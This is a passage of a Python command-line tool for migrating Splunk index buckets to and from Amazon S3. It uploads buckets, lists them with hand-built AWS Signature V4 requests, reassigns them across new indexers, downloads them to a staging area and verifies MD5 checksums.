            # Bucket dir name pieces: <db|rb>_<t1>_<t2>_<id>_<guid>...
            self.bucketId = str.join("_", bucketDirName.split("_")[1:4])
            self.instanceGuid = bucketDirName.split("_")[4]
            self.indexName = attrDict[BucketCollection.KEY_INDEXNAME]
    class PrimaryBucketCollection(object):
        """Maps { bucketId : { indexName : primaryInstanceGuid } }."""
        def __init__(self):
            # BUGFIX: this dict used to be a class-level attribute, silently
            # shared by every instance; it must be per-instance state.
            self._bucketDict = {}
        def maybeAdd(self, bucket):
            """Returns True if bucket is now stored with this instance GUID as
            primary owner."""
            if not bucket.bucketId in self._bucketDict:
                self._bucketDict[bucket.bucketId] = {}
            if not bucket.indexName in self._bucketDict[bucket.bucketId]:
                self._bucketDict[bucket.bucketId][bucket.indexName] = bucket.instanceGuid
                return True
            return False
        def toFile(self, path):
            # BUGFIX: close the output file (the original leaked the handle).
            with open(path, "w") as fd:
                for buckId, buckAttrs in self._bucketDict.items():
                    for buckName, buckOwnerGuid in buckAttrs.items():
                        fd.write("%s\n" % json.dumps(
                            {buckId : {buckName : buckOwnerGuid}}))
    def run(self, args):
        self._args = args
        if 1 == len(self._args.filenames):
            raise Exception("This command does not make sense if only one bucketlist file is specified (you specified: %s)" % self._args.filenames[0])
        rawFDs = [open(filepath, "r") for filepath in self._args.filenames]
        rrFd = RoundRobinFileReader(rawFDs)
        primBuckColl = self.PrimaryBucketCollection()
        # How many buckets each GUID "won" primary ownership of.
        guidCounter = {}
        for line in rrFd:
            apb = self.AssumedPrimaryBucket(line)
            if primBuckColl.maybeAdd(apb):
                if not apb.instanceGuid in guidCounter:
                    guidCounter[apb.instanceGuid] = 1
                else:
                    guidCounter[apb.instanceGuid] += 1
        # Parenthesized single-argument prints behave identically on Py2/Py3.
        print("Stats for created bucket listing:")
        for instance, count in guidCounter.items():
            print("\tInstance=%s is assumed primary for num_buckets=%d." % (instance, count))
        outPath = "splunk_bucketowners.json"
        print("Saving bucket list to path=%s." % outPath)
        primBuckColl.toFile(outPath)
    def __init__(self, destSubParser, cmdName):
        myParser = destSubParser.add_parser(cmdName)
        myParser.set_defaults(func=self.run)
        myParser.add_argument("filenames", nargs="+")
def build_s3_download_bucket_command(destDir, s3Path):
    """Assemble the "aws s3 sync <remote>/ <local>/" argv for one bucket."""
    # Normalize both endpoints to exactly one trailing separator.
    srcUri = s3Path.rstrip(os.sep) + os.sep  # this prob doesn't matter, but...
    dstDir = destDir.rstrip(os.sep) + os.sep
    return ("aws", "s3", "sync", srcUri, dstDir)
def build_s3_upload_bucket_command(bucketPath, instanceGuid, indexName, dirType):
    """Kinda stolen from freezeBucketToS3.py (TODO: unify)."""
    # Destination layout: <base>/<guid>/<index>/<dirType>/<bucket dir name>.
    destS3Uri = "s3://%s/%s/%s/%s/%s" % (
        S3_BASE_PATH.strip("/"),
        instanceGuid,
        indexName,
        dirType,
        os.path.basename(bucketPath))
    return ("aws", "s3", "sync", bucketPath, destS3Uri)
def build_s3_upload_extradata_command(itemPath, instanceGuid):
    """Kinda stolen from freezeBucketToS3.py (TODO: unify)."""
    # Directories get recursively synced; single files get a plain copy.
    if os.path.isdir(itemPath):
        uploadMode = "sync"
    else:
        uploadMode = "cp"
    # NOTE(review): this strips any directory component from the LOCAL source
    # path as well as the S3 key name, so callers appear to be expected to
    # pass paths relative to the CWD - confirm before reusing elsewhere.
    itemPath = os.path.basename(itemPath)
    destS3Uri = "s3://%s/%s/%s/%s" % (
        S3_BASE_PATH.strip("/"),
        instanceGuid,
        KEY_EXTRADATA,
        itemPath)
    return ("aws", "s3", uploadMode, itemPath, destS3Uri)
def run_s3_command(cmdPieces, upOrDown):
    """Run one "aws s3 ..." argv, retrying up to 5 times.

    :param cmdPieces: full argv sequence; the last two elements must be the
                      transfer source and destination (used for logging only).
    :param upOrDown: MODE_UPLOAD or MODE_DOWNLOAD (affects log wording only).
    :return: True once an attempt exits 0, False if all 5 attempts fail.
    Kinda stolen from freezeBucketToS3.py (TODO: unify).
    """
    assert upOrDown in (MODE_UPLOAD, MODE_DOWNLOAD)
    # 5 retries per upload command, because why not?
    for i in range(5):
        # Hacky. TODO
        sys.stdout.write("%s\n %s=%s\n %s=%s\n ..." % (
            upOrDown == MODE_UPLOAD and "Uploading" or "Downloading",
            upOrDown == MODE_UPLOAD and "src" or "dst", cmdPieces[-2],
            upOrDown == MODE_UPLOAD and "dst" or "src", cmdPieces[-1]))
        sys.stdout.flush()
        # TODO: Do this a bit smarter.. have to make sure we call the system
        # python here, totally fails on Ubuntu (but not RHEL6)...
        # BUGFIX: operate on a copy - "env = os.environ" aliased the real
        # environment, so these overrides leaked into the whole process.
        env = os.environ.copy()
        env["PATH"] = "/usr/local/bin:/usr/bin:/opt/ec/aws_client/bin"
        env["LD_LIBRARY_PATH"] = ""
        env["PYTHON_PATH"] = ""
        proc = subprocess.Popen(cmdPieces, stdout=subprocess.PIPE,
            stderr=subprocess.PIPE, shell=False, env=env)
        (stdout, stderr) = proc.communicate()
        # Success!
        if 0 == proc.returncode:
            sys.stdout.write(" Done!\n")
            sys.stdout.flush()
            return True
        sys.stdout.write("\n")
        sys.stdout.flush()
        sys.stderr.write("FAILED command %s !\n\n==> STDOUT:\n%s\n==> STDERR:\n%s\n\n" % (
            cmdPieces, stdout, stderr))
    # All 5 attempts failed... Caller should consider this fatal for entire job.
    return False
class CMD_UploadBucketsToS3FromBucketList(object):
    """Subcommand: push every bucket named in this instance's bucketlist file,
    plus the manifest/checksum side files, up to S3."""
    def __init__(self, destSubParser, cmdName):
        subParser = destSubParser.add_parser(cmdName)
        subParser.set_defaults(func=self.run)
    def run(self, args):
        self._args = args
        # Convenience...
        self.instance_guid = get_instance_guid()
        # MESSY! Use the builder functions... TODO
        inputFile = "splunk_bucketlist_%s.json" % self.instance_guid
        EXTRADATA = ("splunk_bucketmanifests",
            inputFile,
            # MESSY! Use the builder functions... TODO
            "splunk_%s_%s.md5" % (KEY_CHKSUMLIST, self.instance_guid))
        # Sanity-check that all side files are present before any upload work.
        for file in EXTRADATA:
            if os.path.exists(file):
                continue
            raise Exception("File %s does not exist - are you sure you"
                            " followed the directions?" % file)
        knownBuckets = BucketCollection()
        knownBuckets.fromFile(inputFile)
        # Side files first, then every bucket directory.
        for file in EXTRADATA:
            extraCmd = build_s3_upload_extradata_command(file, self.instance_guid)
            # DEBUG: print extraCmd
            if not run_s3_command(extraCmd, MODE_UPLOAD):
                raise Exception("Upload process failed, please triage and try again!")
        for index, dirType, dirPath, bucketName in knownBuckets.items():
            bucketCmd = build_s3_upload_bucket_command(
                os.path.join(dirPath, bucketName),
                self.instance_guid, index, dirType)
            # DEBUG: print bucketCmd
            if not run_s3_command(bucketCmd, MODE_UPLOAD):
                raise Exception("Upload process failed, please triage and try again!")
        print("\nALL UPLOADS COMPLETE!\n")
class CMD_ListAllSplunkBucketsFromS3(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("s3url", help="S3 path to enumerate (like s3://foo/bar)")
myParser.add_argument("region", help="AWS region (like us-west-2)")
myParser.add_argument("guid", help="Guid of the on prem server")
def run(self, args):
self._args = args
if not self._args.s3url.startswith(S3_URL_PREFIX):
raise Exception("Only S3 URLs are supported - URL must begin with s3://...")
if not "AWS_ACCESS_KEY" in os.environ:
raise Exception("Command will not work without AWS_ACCESS_KEY set in environment.")
if not "AWS_SECRET_KEY" in os.environ:
raise Exception("Command will not work without AWS_SECRET_KEY set in environment.")
s3FullPath = self._args.s3url[len(S3_URL_PREFIX):]
if "/" in s3FullPath:
s3Bucket, s3Path = s3FullPath.split("/", 1)
else:
s3Bucket = s3FullPath
s3Path = ""
print "Will list: s3://%s/%s" % (s3Bucket, s3Path)
onPremGuid = self._args.guid
coll = BucketCollection()
checksumURLs = []
getOffset = None
s3Path_ccs = s3Path+"/"+onPremGuid
print "Working on "+s3Path_ccs
while True:
# throws on any non-200 response.
resp = self.issue_s3_request(s3Bucket, s3Path_ccs, getOffset)
getOffset = self.parseS3ListingXML(coll, checksumURLs, resp, s3Bucket, s3Path)
if not getOffset:
outPath = "bucketsInS3-"+onPremGuid+".json"
print "Saving to %s ..." % outPath
coll.toFile(outPath)
coll = BucketCollection()
break
print "Done."
if not checksumURLs:
print "No checksum files to download."
else:
print "Downloading checksum files..." % checksumURLs
for csumPath in checksumURLs:
dlCmd = ["aws", "s3", "cp", csumPath, "."]
if not run_s3_command(dlCmd, MODE_DOWNLOAD):
raise Exception("Checksum download process failed, please triage and try again!")
print "Done."
def parseS3ListingXML(self, coll, csums, resp, s3Bucket, s3Path):
"""Output: coll (BucketCollection), csums (checksums), nextOffset.
If we need to fetch more data, returns offset marker."""
bucketRegex = re.compile("([\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})" \
"/([^/]+)/([^/]+)/([dr]b_\\d+_\\d+_\\d*" \
"(_[\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})?(-tmp)?)/?(.*)")
# str - stupid xml lib barfs on unicode str w/ encoding declaration (<?xml>).
xmlRoot = et.fromstring(str(resp))
# Exception here would mean S3 response format has changed.
isTruncated = bool(xmlRoot.find(".//{%s}IsTruncated" % XML_AWS_NS).text)
lastItem = None
for item in xmlRoot.findall(".//{%s}Key" % XML_AWS_NS):
lastItem = item.text # :-/
# Strip the leading prefix the user requested... NOTE: this restricts
# us to only treating prefix as a directory path rather than an
# partial-filename prefix - this is totally ok for us.
# Strip in case no trailing slash in user specified S3 path...
itemPath = item.text[len(s3Path):].strip("/")
# Silently skip some just-in-case diagnostic info we've uploaded...
if -1 != itemPath.find(KEY_EXTRADATA):
# But keep the checksums, we'll use these.
if KEY_CHKSUMLIST in itemPath:
csums.append("s3://%s/%s/%s" % (s3Bucket, s3Path, itemPath))
continue
matches = bucketRegex.match(itemPath)
if not matches:
raise Exception, "Not proceeding - found itemPath=\"%s\" that" \
" does not match bucketRegex - please investigate." % itemPath
# maybeBucketGuid is unused, the optional guid capture group...
indexerGuid, indexName, buckDirType, bucketName, \
maybeBucketGuid, maybeTmp, afterBucketName = matches.groups()
parentPathInS3 = "%s/%s/%s/%s/%s" % (s3Bucket, s3Path, indexerGuid,
indexName, buckDirType)
# DEBUG: print "GUID: %s, index: %s, dirType: %s,\t name: %s" % (
# DEBUG: indexerGuid, indexName, buckDirType, bucketName)
coll.addBuckets(indexName, buckDirType, "s3://%s" % parentPathInS3,
(bucketName,))
return isTruncated and lastItem or None
def issue_s3_request(self, s3Bucket, s3Path, offset):
method = "GET"
s3FullHost = "%s.%s" % (s3Bucket, S3_HOSTNAME)
emptyHash = hashlib.sha256("").hexdigest()
timeNow = time.gmtime()
headers = {
"Host" : s3FullHost
, "x-amz-content-sha256" : emptyHash # No request body.
, "x-amz-date" : time.strftime("%Y%m%dT%H%M%SZ", timeNow)
}
getParams = {}
if len(s3Path):
getParams["prefix"] = s3Path
if offset:
getParams["marker"] = offset
headers["Authorization"] = self.build_s3_auth_token(method, headers,
emptyHash, timeNow, getParams)
req = requests.Request(method, "https://%s" % s3FullHost,
params=getParams, data="", headers=headers)
sess = requests.Session()
# This is better than req.prepare() because it can apply cookies/etc...
prepReq = sess.prepare_request(req)
resp = sess.send(prepReq)
if 200 != resp.status_code:
raise Exception, "Request failed, response_code=%d, response=%s !!" \
% (resp.status_code, resp.text)
return resp.text
    def build_s3_auth_token(self, httpMethod, headers, contentHash, requestTime,
            getParams):
        """Did this whole mess (AWS4 auth) to avoid a dependency on boto within
        the Splunk Python installation...

        Builds the value of the "Authorization" header using the AWS
        Signature Version 4 scheme: canonical request -> string-to-sign ->
        HMAC signing-key chain -> signature.  Credentials come from the
        AWS_SECRET_KEY / AWS_ACCESS_KEY environment variables and the region
        from --region.
        """
        dateOnly = time.strftime("%Y%m%d", requestTime)
        dateTime = time.strftime("%Y%m%dT%H%M%SZ", requestTime) # ISO8601 per AWS API.
        # DEBUG: print "headers: %s" % headers
        # All headers that we include in canonicalRequest.
        signedHeaders = str.join(";", sorted(headers.keys())).lower()
        # AWS, why u auth so picky (http://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-header-based-auth.html)
        # DEBUG: print "signedHeaders: %s" % signedHeaders
        canonicalRequest = str.join("\n", [
            httpMethod
            , "/" # Enter a full path here only to download an actual object...
            # Per http://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html
            # NOTE(review): urllib.urlencode uses quote_plus (space -> "+"),
            # but AWS canonical query strings expect %20-style encoding.
            # Presumably fine for the prefix/marker values used here — confirm
            # before signing parameters containing spaces or special chars.
            , str.join("&", [urllib.urlencode({k : getParams[k]})
                    for k in sorted(getParams.keys())])
            # Don't necessarily have to hash ALL headers, but it's easiest and only more secure.
            , str.join("\n", ["%s:%s" % (key.lower(), headers[key]) for key in sorted(headers.keys())])
            , "" # Empty line after headers, like HTTP.
            , signedHeaders
            , contentHash # Matches headers (no request body).
        ])
        canonicalRequestHash = hashlib.sha256(canonicalRequest).hexdigest()
        # DEBUG: print "canonicalRequest: %s" % canonicalRequest
        # DEBUG: print "canonicalRequestHash: %s" % canonicalRequestHash
        credentialScope = "%s/%s/%s/%s" % (dateOnly, self._args.region, "s3", "aws4_request")
        # DEBUG: print "credentialScope: %s" % credentialScope
        # http://docs.aws.amazon.com/general/latest/gr/sigv4-create-string-to-sign.html
        stringToSign = str.join("\n", [
            "AWS4-HMAC-SHA256"
            , dateTime
            , credentialScope
            , canonicalRequestHash
        ])
        # DEBUG: print "stringToSign: %s" % stringToSign
        def sign(key, content):
            # One step of the HMAC-SHA256 key-derivation chain.
            # DEBUG: print "to-sign content=%s with key=%s" % (content, key)
            output = hmac.new(key, content, hashlib.sha256).digest()
            # DEBUG: print " ==> output=%s" % output
            return output
        # Signing-key derivation: secret -> date -> region -> service -> "aws4_request".
        a = sign(("AWS4%s" % os.environ["AWS_SECRET_KEY"]), dateOnly)
        b = sign(a, self._args.region)
        c = sign(b, "s3")
        d = sign(c, "aws4_request")
        # Note hexdigest vs digest above...
        signature = hmac.new(d, stringToSign, hashlib.sha256).hexdigest()
        # DEBUG: print "signature=%s" % signature
        return "%s Credential=%s/%s,SignedHeaders=%s,Signature=%s" % (
            "AWS4-HMAC-SHA256", os.environ["AWS_ACCESS_KEY"],
            credentialScope, signedHeaders, signature)
# TODO this needs to accommodate actual index paths, not make assumptions...
def bucketDirTypeToDirName(buckType):
    """Map an indexes.conf path type (e.g. "homePath") to the on-disk
    directory name Splunk uses for that bucket class (e.g. "db").

    Raises Exception for unrecognized types.
    """
    # I think freezeBucketToS3.py uploads into a "cold" dir, which is a
    # mistake - accept both spellings for cold buckets.
    if buckType in ("coldPath", "cold"):
        return "colddb"
    # TODO: test this stuff with bulk upload...
    if buckType == "homePath":
        return "db"
    if buckType == "thawedPath":
        return "thaweddb"
    # Py2-only "raise Exception, msg" replaced with the portable call form.
    raise Exception("Unexpected buckettype=%s." % buckType)
# TODO
def getSearchableIndexName(indexName):
    """Names are stored differently in the s3 upload - we use the index name,
    not the index path on disk!! Hopefully then names and index dirs for
    all non-predefined indexes are not different! TODO"""
    # Known index-name -> on-disk-directory-name translations; anything not
    # listed maps to itself.
    dirNames = {
        "main": "defaultdb",
        "_audit": "audit",
        "_internal": "_internaldb",
        "corp": "corpdb",
        "owa": "owadb",
        "pan": "pandb",
        "pci": "pcidb",
        "prod": "proddb",
        "summary": "summarydb",
    }
    return dirNames.get(indexName, indexName)
# TODO
def getDisplayIndexName(indexName):
    """Reverse of getSearchableIndexName. Opencoding rather than collapsing into
    a dict so I can guarantee other codepaths are unaffected.
    (Note: only the three predefined directories are mapped back; everything
    else passes through unchanged, matching the original if-chain.)"""
    displayNames = {
        "defaultdb": "main",
        "audit": "_audit",
        "_internaldb": "_internal",
    }
    return displayNames.get(indexName, indexName)
class CMD_GenNewBucketOwnersFromS3BucketList(object):
    """Subcommand: re-assign every bucket of one index (from an S3 bucket
    listing JSON file) to a new set of indexer GUIDs, round-robin.  Writes
    one dest_buckets_<guid>_<index>.json (and, when checksum lists were
    downloaded, one dest_checksums_<guid>_<index>.md5) per target indexer."""

    def __init__(self, destSubParser, cmdName):
        # Register this subcommand and its arguments on the shared subparser.
        myParser = destSubParser.add_parser(cmdName)
        myParser.set_defaults(func=self.run)
        myParser.add_argument("--extra-copies", type=int, default=0, metavar="num",
                help="Cause \"num\" extra copies of each bucket to be" \
                     " downloaded. Can be of use if only one copy of each" \
                     " bucket was uploaded.\n" \
                     "Does NOT take geosites into account.")
        myParser.add_argument("--no-checksums", action="store_true")
        myParser.add_argument("bucket_list", help="JSON file from list-all-buckets...s3")
        myParser.add_argument("guid_list",
                help="File: GUIDs for new indexers, one per line, must have .guids extension")
        myParser.add_argument("index", help="The name of the index to re-assign")

    def run(self, args):
        """Read the bucket list and GUID list, spread buckets of the selected
        index across the GUIDs round-robin (avoiding giving one indexer two
        copies of the same bucket ID), then write per-GUID output files."""
        self._args = args
        selected_index = self._args.index
        print "Limiting reassignemt to "+selected_index
        # Error checks.
        if not self._args.bucket_list.endswith(".json"):
            raise Exception("Bucket list file must have .json extension" \
                    " - are you sure you passed the correct filename" \
                    " (you passed \"%s\")?" % self._args.bucket_list)
        if not self._args.guid_list.endswith(".guids"):
            raise Exception("GUID list file must have .guids extension" \
                    " - are you sure you passed the correct filename" \
                    " (you passed \"%s\")?" % self._args.guid_list)
        if self._args.extra_copies:
            if self._args.extra_copies > 5:
                raise Exception("Aborting - highly unlikely you want to create" \
                        " more than 5 copies of each bucket!")
            print "Will create %d additional copies of each bucket." \
                    % self._args.extra_copies
        # Load target indexer GUIDs, one per line; skip anything that does
        # not look like a GUID.
        guidRE = re.compile("^[\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12}$")
        indexerGuids = []
        with open(self._args.guid_list, "r") as guidFd:
            for line in guidFd:
                line = line.strip()
                if not guidRE.match(line):
                    print "WARNING: Skipping non-guid line: \"%s\" from file=%s." % (
                        line, self._args.guid_list)
                    continue
                indexerGuids.append(line)
        # Look for downloaded checksum files.
        csumFiles = []
        if not self._args.no_checksums:
            csumGlob = "splunk_%s_*" % KEY_CHKSUMLIST
            csumFiles = glob.glob(csumGlob)
            if not csumFiles:
                raise Exception, "Found no checksum files matching glob %s." \
                        " If you want to skip the ability to checksum, use" \
                        " --no-checksums." % csumGlob
            print "Found %d checksum lists." % len(csumFiles)
        # Hi I came to take ur RAM. Sorry, this has to be relatively quick and dirty for now...
        # Build csumDict[indexDirName][bucketName][relativePath] = md5sum.
        csumDict = {}
        for file in csumFiles:
            with open(file, "r") as csumFd:
                for line in csumFd:
                    # Slower but more resilient... Could just count the 32 bytes + 2 spaces...
                    left, messyRight = line.split(" ", 1)
                    right = messyRight.lstrip().rstrip("\r\n")
                    # TODO: make sure os.sep is right to use here... should be... (windows).
                    #
                    index, garbage, bucket = right.split(os.sep)[0:3]
                    if not index in csumDict:
                        csumDict[index] = {}
                    if not bucket in csumDict[index]:
                        csumDict[index][bucket] = {}
                    # Store in RAM: bucket name, filepath, checksum. Will look these up soon..
                    csumDict[index][bucket][right] = left
        # TODO: we prob need a guid dict level too - 2 replicated buckets will have non-unique
        # names if now living on 2 different GUIDs.
        # DEBUG: print csumDict
        # Read bucket list.
        coll = BucketCollection()
        coll.fromFile(self._args.bucket_list)
        print "Found %d buckets in file=%s." % (
            len(coll), self._args.bucket_list)
        print "Will distribute %d buckets to %d indexers per file=%s." % (
            len(coll) * (1 + self._args.extra_copies), len(indexerGuids),
            self._args.guid_list)
        # Main spraying loop - just builds file lists, doesn't download anything.
        bucketColls = {} # Output - eventually written to file.
        csumColls = {} # Also output, written to another file.
        # Very much like bucketColls. However, strips db_ and rb_ so we can
        # see whether a bucket with the remaining portion
        # (timestamps/serial/guid) is already allocated to this indexer. We can
        # do this WAY smarter, by storing the IDs in bucketColls along with a an
        # attr describing whether it's rb_ or db_. But not making that change
        # this late in the game... TODO. Also, BucketCollection could and
        # should do this for is.
        bucketIds = {}
        for guid in indexerGuids:
            bucketColls[guid] = BucketCollection()
            csumColls[guid] = []
            bucketIds[guid] = []
        guidOff = 0
        bucketIdRE = re.compile('^[dr]b_(.*)')
        found = 0
        prev_indexName = "foo"
        prev_num = 0
        step = 10000
        for indexName, dirType, bucketParentDir, bucketName in coll.items():
            #if indexName != prev_indexName:
            #    print indexName
            #    prev_indexName = indexName
            # Only the index selected on the command line is re-assigned.
            if indexName != selected_index: continue
            if found == 0 :
                print "Found index="+indexName
                found = 1
            remainingCopies = 1 + self._args.extra_copies
            # TODO freezeBucketToS3.py
            realIndexDirName = getSearchableIndexName(indexName)
            bucketId = bucketIdRE.match(bucketName).group(1) # eg: db_1416781732_1416781534_9_D1EBB8B2-DA8A-401E-8AC2-A98214754674
            num_guid_trys = 0
            while remainingCopies > 0:
                guid = indexerGuids[guidOff]
                num_guid_trys = num_guid_trys + 1
                # Does this indexer already have a bucket with this ID assigned
                # to it (maybe an rb_ for this db_, etc)?
                if bucketId in bucketIds[guid]:
                    # print bucketId, guid, remainingCopies
                    # Let's try finding another...
                    guidOff = (guidOff + 1 < len(indexerGuids)) and guidOff + 1 or 0
                    #print str(num_guid_trys)+" BucketId is already in the list. "+bucketId+" guidOff="+str(guidOff)
                    # It is possible that there is MORE more buckets than indexers. In which case ...
                    # .... we skip this bucket, cuz we already have buckets by the same name on ALL the indexers
                    if num_guid_trys > len(indexerGuids) :
                        print "It is odd that index "+indexName+" has more than "+str(len(indexerGuids))+" buckets all with the same name "+bucketId
                        break
                    continue
                # Store bucket ID.
                #print "GUID = "+guid+" Found a new bucketID "+bucketId
                bucketIds[guid].append(bucketId)
                # We don't have checksums for c2f buckets...
                # DEBUG: print "%50s\t %s" % (realIndexDirName, bucketName)
                # DEBUG: print "INDEX NAME: %s" % indexName
                if realIndexDirName in csumDict and bucketName in csumDict[realIndexDirName]:
                    # DEBUG: print "%20s\t %s" % (realIndexDirName, bucketName)
                    # FIXME: hack per freezeBucketToS3.py ...
                    csumPrefix = "%s/%s/%s/" % (realIndexDirName, bucketDirTypeToDirName(dirType), bucketName)
                    # DEBUG: print "searching with %s" % csumPrefix
                    count = 0
                    for k, v in csumDict[realIndexDirName][bucketName].items():
                        # DEBUG: print "\t\t\t%s\t %s" % (k, v)
                        if k.startswith(csumPrefix):
                            count += 1
                            # two spaces so works with md5sum cli cmd...
                            csumColls[guid].append("%s %s" % (v, k))
                    # DEBUG: print "found %d matches" % count
                # Store bucket.
                #print "Storing bucket "+indexName+" "+dirType+" "+bucketParentDir+" "+bucketName
                bucketColls[guid].addBuckets(indexName, dirType, bucketParentDir, (bucketName,))
                # Report progress ,,,,,
                #if len(bucketColls[guid])/step > prev_num :
                #    prev_num = len(bucketColls[guid])/step
                #    print selected_index+" => "+str(prev_num)
                # Next guid...
                guidOff = (guidOff + 1 < len(indexerGuids)) and guidOff + 1 or 0
                remainingCopies -= 1
        # DEBUG: print csumColls
        # Save to file and print a bit.
        print
        for guid in indexerGuids:
            buckOutFile = "dest_buckets_%s_%s.json" % (guid, selected_index)
            print "Saving %d buckets to file=%s ..." % (len(bucketColls[guid]),
                buckOutFile)
            bucketColls[guid].toFile(buckOutFile)
            if len(csumColls[guid]):
                csumOutFile = "dest_checksums_%s_%s.md5" % (guid, selected_index)
                print "Saving %d checksums to file=%s ..." % (len(csumColls[guid]),
                    csumOutFile)
                with open(csumOutFile, "w") as outFd:
                    for line in csumColls[guid]:
                        # Translate the on-disk "defaultdb" dir back to the
                        # user-facing "main" index name in checksum paths.
                        if -1 != line.find("defaultdb%s" % os.sep): # TODO os.sep ?
                            line = line.replace("defaultdb%s" % os.sep,
                                    "main%s" % os.sep, 1)
                        outFd.write("%s\n" % line)
            else:
                print "No checksums found for buckets to copy to GUID=%s." % guid
        print "\nDone."
class CMD_DownloadBucketsToStagingDir(object):
    """Subcommand: on an indexer, download the buckets assigned to this
    instance's GUID (per a dest_buckets_<guid>.json file) from S3 into a
    staging directory under $SPLUNK_DB."""

    def __init__(self, destSubParser, cmdName):
        # Register this subcommand on the shared subparser.
        myParser = destSubParser.add_parser(cmdName)
        myParser.set_defaults(func=self.run)
        myParser.add_argument("bucket_list", help="JSON file from gen-new-bucket...")

    def run(self, args):
        """Validate that the bucket list belongs to THIS indexer, then
        download each listed bucket into the staging tree."""
        self._args = args
        # Convenience...
        self.instance_guid = get_instance_guid()
        # The GUID embedded in the filename must match this instance, else we
        # would duplicate data onto the wrong indexer.
        bucketListRE = "^dest_buckets_([\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})\\.json$"
        basename = os.path.basename(self._args.bucket_list)
        matches = re.match(bucketListRE, basename)
        if not matches:
            raise Exception, "Bucket list filename must be in the format" \
                    " dest_buckets_<this_indexer_guid>.json, you provided" \
                    " filename=\"%s\"." % basename
        if not matches.group(1) == self.instance_guid:
            raise Exception, "Aborting: This bucket list is for Splunk indexer" \
                    " with GUID=%s, but my GUID is %s. It sounds like you've" \
                    " mixed up the various bucket lists! This will cause data" \
                    " duplication, so will not proceed." % (
                        matches.group(1), self.instance_guid)
        coll = BucketCollection()
        coll.fromFile(self._args.bucket_list)
        # Build bucket download commands.
        cmds = []
        stagingDestDirBase = os.path.join(os.environ["SPLUNK_DB"], STAGING_DIR)
        print "Will download data to %s.\n" % stagingDestDirBase
        for index, dirType, bucketParentDir, bucketName in coll.items():
            # FIXME: hack per freezeBucketToS3.py ...
            realIndexDirName = getSearchableIndexName(index)
            # Sanity check: the destination index must already be configured
            # (its directory must exist) on this indexer.
            testIdxPath = os.path.join(os.environ["SPLUNK_DB"], realIndexDirName)
            if not os.path.exists(testIdxPath):
                raise Exception, "Aborting: The path=\"%s\" for index=%s does" \
                        " not exist - it looks like something is different about" \
                        " this indexer's configuration. Please review." % (
                            testIdxPath, index)
            stagingDestDir = os.path.join(stagingDestDirBase, index, dirType,
                    bucketName)
            if not os.path.exists(stagingDestDir):
                os.makedirs(stagingDestDir)
            cmds.append(build_s3_download_bucket_command(
                stagingDestDir,
                # S3 path to download from.
                "%s/%s" % (bucketParentDir, bucketName)))
        # Download!
        for cmd in cmds:
            if not run_s3_command(cmd, MODE_DOWNLOAD):
                raise Exception("Download process failed, please triage and try again!")
        print "Done."
class CMD_VerifyDownloadedFiles(object):
    """Subcommand: MD5-verify every file downloaded into the staging
    directory against the dest_checksums_<guid>.md5 list produced by
    gen-new-bucket-owners."""

    def __init__(self, destSubParser, cmdName):
        # Register this subcommand on the shared subparser.
        myParser = destSubParser.add_parser(cmdName)
        myParser.set_defaults(func=self.run)
        myParser.add_argument("--c2f", action="store_true", help="Activates require workaround for c2f uploaded buckets.")
        myParser.add_argument("checksum_list", help="Checksum list generated by gen-new-bucket-...")

    def run(self, args):
        """Check that the checksum list belongs to this indexer, then hash
        every listed file under the staging tree and compare."""
        self._args = args
        # Convenience...
        self.instance_guid = get_instance_guid()
        csumListRE = "^dest_checksums_([\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})\\.md5$"
        basename = os.path.basename(self._args.checksum_list)
        matches = re.match(csumListRE, basename)
        if not matches:
            raise Exception, "Checksum list filename must be in the format" \
                    " dest_checksums_<this_indexer_guid>.md5, you provided" \
                    " filename=\"%s\"." % basename
        if not matches.group(1) == self.instance_guid:
            raise Exception, "Aborting: This checksum list is for Splunk indexer" \
                    " with GUID=%s, but my GUID is %s. It sounds like you've" \
                    " mixed up the various checksum lists!" % (
                        matches.group(1), self.instance_guid)
        def convertFilePath(path):
            # Translate a checksum-list relative path (on-disk layout, e.g.
            # "defaultdb/db/<bucket>/...") into the staging-dir layout, which
            # uses display index names and dirType names (homePath/coldPath).
            pieces = path.split(os.sep) # TODO os.sep??
            pieces[0] = getDisplayIndexName(pieces[0])
            if self._args.c2f:
                for i in range(len(pieces)):
                    if pieces[i] == "colddb":
                        pieces[i] = "cold" # TODO: due to freezeBucketToS3.py
            else:
                for i in range(len(pieces)):
                    if pieces[i] == "colddb":
                        pieces[i] = "coldPath" # TODO: due to freezeBucketToS3.py
                    elif pieces[i] == "db":
                        pieces[i] = "homePath" # TODO: due to freezeBucketToS3.py
            return os.path.join(*pieces)
        stagingDestDirBase = os.path.join(os.environ["SPLUNK_DB"], STAGING_DIR)
        numMatched = 0
        numFailed = 0
        with open(self._args.checksum_list) as csumFile:
            for line in csumFile:
                matched = True
                # <hash><2 spaces><file path> like what md5sum uses.
                hash, filepath = filter(lambda x: x.strip(), line.split(" "))
                filepath = filepath.strip()
                fullPath = os.path.join(stagingDestDirBase, convertFilePath(filepath))
                try:
                    with open(fullPath, "rb") as verifFd:
                        actualHash = fileMd5Hash(verifFd)
                        if hash != actualHash:
                            matched = False
                            sys.stderr.write("MD5 did not match for file=\"%s\", expected=%s actual=%s!\n" \
                                    % (fullPath, hash, actualHash))
                            sys.stderr.flush()
                except IOError, e:
                    matched = False
                    sys.stderr.write("No such file: %s on host=%s!\n" % (fullPath, socket.gethostname()))
                    sys.stderr.flush()
                if matched:
                    numMatched += 1
                else:
                    numFailed += 1
        if not numFailed:
            print "Everything matched! Success! (%d matched)" % numMatched
        else:
            sys.stderr.write("There were failures. :( (%d matched, %d failed)\n" % (numMatched, numFailed))
class CMD_MoveStagedDataToIndexes(object):
    """Subcommand: move previously downloaded (and ideally verified) buckets
    out of the staging directory into their real index directories, then
    remove the now-empty staging tree.  Dry-run unless --actually-move."""

    def __init__(self, destSubParser, cmdName):
        # Register this subcommand on the shared subparser.
